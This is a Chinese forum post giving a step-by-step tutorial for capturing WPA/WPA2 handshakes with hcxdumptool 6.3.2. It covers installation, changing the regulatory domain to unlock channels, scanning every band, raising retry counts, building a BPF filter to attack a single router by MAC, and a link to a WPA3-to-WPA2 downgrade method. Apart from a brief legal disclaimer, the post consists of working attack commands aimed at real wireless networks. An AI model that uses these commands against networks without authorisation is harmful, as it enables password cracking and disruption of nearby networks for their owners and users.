大校
- 注册时间
- 2015-5-1
- 金币
- 16904 个
- 威望
- 12 个
- 荣誉
- 1 个
累计签到:1 天 连续签到:0 天 [LV.20]漫游旅程
|
本帖最后由 上上网 于 2024-2-18 14:33 编辑
声明: 使用此工具前,你必须有攻击网络的权限, 执行持久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。
工具hcxdumptool 6.3.2
下载安装最新
依次执行以下命令安装
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool-master
sudo make && sudo make install
有下不了的情况, 这有文件放进去执行上述命令即可
接下来
首先,设置到畅通无阻域是成功关键因素
sudo iw reg set IN && iw reg get
查看一下你要使用网卡接口
sudo hcxdumptool -l 或 sudo hcxdumptool -L
执行捕获你网卡支持所有频段握手包
sudo hcxdumptool -F --rds=1
默认自动使用网卡接口编号是wlan0, 如果有插入多块网卡,需对应你自己要使用网卡接口位编号, 例如要使用-i wlan0 或 -i wlan2
执行
sudo hcxdumptool -i wlan0 -F --rds=1
从2.4ghz到5ghz历遍一次攻击周期约1-2分钟 , -i wlan0 网卡接口位编号, -F 使用网卡支持所有频段, --rds=1 排序, 文件名称默认使用日期时间命名, 如要指定文件名加参数-w, -w SSID.pcapng 可用SSID 或MAC DCAEFB命名
如果信号较差, 又必需要捕获到有效握手, 增大重新攻击重试, 工具默认值是: attemptclientmax=10 attemptapmax=4
sudo hcxdumptool -F --rds=1 --attemptclientmax=100 --attemptapmax=100
如果要攻击单个MAC路由器信号
1 > 先扫描一下2.4Ghz全部信道, 普通模式 --rcascan=p 主动模式 --rcascan=a 如果网卡支持,主动模式会有信标响应, 可按响应计数排序--rds=1
sudo hcxdumptool --rds=1 --rcascan=p -c 1a,2a,3a,4a,5a,6a,7a,8a,9a,10a,11a,12a,13a,14a
或扫描你网卡支持2.4Ghz+5Ghz所有频率信道, 使用网卡支持所有信道参数-F 如不加参数-F 只扫描1, 6, 11信道
sudo hcxdumptool -F --rcascan=a --rds=1
2 > 设置网卡为监控模式(如果有插入多块网卡,对应你自己网卡接口位 -i wlan0), 如果创建BPF过滤器失败情况, 需要执行一下这命令
sudo hcxdumptool -m wlan0
3 > 创建BPF过滤器, 需添加你网卡接口对应编号-i wlan0 攻击单个目标MAC: 00:00:00:00:00:01 创建BPF前需要执行一下设置网卡监控命令, 否则创建BPF可能会失败情况
执行创建BPF 攻击单个MAC路由器
sudo tcpdump -i wlan0 wlan addr3 000000000001 -ddd >g.bpf
4 > 执行捕获单个MAC路由器
sudo hcxdumptool -F --bpf=g.bpf
有经验用户, 如要指定对应信道参数-c 如11 和 165信道, 更准确地攻击, 减轻网卡活动周期优化时间。
注意要对应目标信道: 11a,165b 2.4g信道加a 5g信道加b 6g信道加c 是必须, 因为WiFi6不是唯一信道 !
sudo hcxdumptool -c 11a,165b --bpf=g.bpf
捕获文件默认在Home文件夹下 !文件名称是以日期时间命名, 文件格式是pcapng固定格式
补充图解
更详细信息hcxdumptool -help 或跳转 >>>
攻击WPA3降级从而捕获为WP2握手包
https://www.anywlan.com/forum.ph ... 321&fromuid=1093833
补充内容 (2024-5-28 11:18):
注意: 自从 hcxdumptool6.3.2 之后起版本, 需要安装依赖
sudo apt-get update
sudo apt install -y libpcap-dev |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
|